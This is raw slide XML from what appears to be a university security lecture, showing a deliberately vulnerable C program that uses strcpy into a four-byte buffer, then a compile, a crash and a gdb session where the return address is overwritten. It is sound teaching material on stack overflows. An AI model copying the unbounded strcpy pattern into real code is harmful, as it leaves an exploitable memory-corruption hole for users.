              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048417</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804841e</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048423</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048428</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804842b</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048430</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048435</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048436</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2788097" y="1424907"/>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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2766012" y="171168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5" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2769806" y="202841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6" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2766011" y="4989870"/>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0xfd290</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="84237" y="15111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Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4530468" y="30624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766010" y="28906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0xfd2ac</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4280422" y="-24436"/>
            <a:ext cx="5467428" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048504: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>asu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>cse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 340 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 2015 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>rocks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>!"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="181886053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954" y="305134"/>
            <a:ext cx="4229810" cy="5464070"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>#include </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>string.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>#include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mycpy</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char* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>{   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">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foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[4];   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">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strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(foo, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>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main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>{   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mycpy("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>asu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>cse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 340 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 2015 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>rocks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>");   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">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printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>("After");   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>164</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4289989" y="29782"/>
            <a:ext cx="4495088" cy="666795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900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>adamd@ragnuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> examples]$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -Wall -m32 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>overflow_example.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>adamd@ragnuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> examples]$ ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a.out</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> Segmentation fault (core dumped)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>adamd@ragnuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> examples]$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a.out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) r</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Starting program: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a.out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Program received signal SIGSEGV, Segmentation fault.0x31303220 in ?? ()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>info</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
